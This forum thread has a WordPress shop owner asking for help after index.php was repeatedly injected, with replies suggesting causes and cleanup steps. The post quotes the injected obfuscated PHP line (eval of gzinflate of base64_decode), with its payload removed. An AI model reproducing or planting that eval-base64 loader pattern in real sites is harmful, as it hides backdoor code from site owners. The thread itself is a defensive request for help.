    Site was hacked...need help bad!

    Hi everyone,

    I'm new here! Well, long story short, I run a small online store hosted by GoDaddy using WordPress. My site got hacked and I have no idea what to do. :[ If anyone knows how to fix the root of this problem, please let me know. I really need help here! (And yes, if it's something that takes work I can even offer some cash).


    Description of problem:

    When I went to check out the files on the server, I noticed the index.php file had been edited, and the following script was placed in the file:

    <?php eval(gzinflate(base64_decode('[base64 payload removed]')));?>

    I erased this script, re-uploaded the file, and the site was restored to how it was before. I changed the GoDaddy account password and the FTP account password to avoid this happening again. However, within 24 hours of this, the site was crashed again and the same script had been placed in the index.php file.

    So yeah, obviously not sure what to do or how to find the problem. If anyone knows anything, or wants to help and possibly earn some cash, please let me know!

    Chris G
    Respected Member
    You are probably keylogged. Try formatting everything and scan your PC for viruses. Once done, install KeyScrambler, change your passwords and try reverting to your old backup. Should work fine.

    The warning message you see is due to a blank line at the beginning or end of one of your files. PHP does not like blank lines.
    Also, it may mean that some of your files are still infected and you could get more malware. I can tell you from experience that you probably have been exploited through a weak password or WordPress vulnerability and there is surely a backdoor script on your account. If you want more details or assistance let me know and I can provide you with my knowledge further.
    I do cleanups on infected sites on a daily basis.

    Thanks for all the help guys! I'm doing my best to try and understand what all this means, but everything will be passed onto my IT guy. Hopefully we can figure this out ASAP.

    If you have FTP & SQL backups, no need to worry about it.

    Now this error message comes up:

    "Reported Attack Page!
    This web page at ur domain has been reported as an attack page and has been blocked based on your security preferences."

    Unlike the previous post, you should worry about it.

    Get an SQL backup immediately. Then hunt for another WordPress theme. After that, reformat your VPS/server (are you on a shared host?). Then start again with the new theme and the old SQL file.

    Does anyone suggest a site/service I can hire to clean the site and return it to the way it was/listings back on Google?

    Dude, your site was hacked the following way:
    One of your plugins is vulnerable to a file upload vulnerability; the hacker uploaded his malicious file (his own index.php) and then defaced your site.
    Solution: Fix your security
    It's nothing related to GoDaddy, it's WordPress
    1. Update to latest versions
    2. Triple check your plugins and update them all
    3. Change your WordPress admin password
    4. Do a check on your server to see if the hacker uploaded a backdoor shell to the site; check if any PHP files have been backdoored
    You are good to go
    Helping people is my hobby.....
    Learn how to secure your server against ddos

    Update your WP to latest version. After that scan for viruses. Then change all your passwords to at least 12 char randomly generated passwords. Why? Because they are REALLY hard to crack (if he's getting your password hash in the first place, which I doubt)

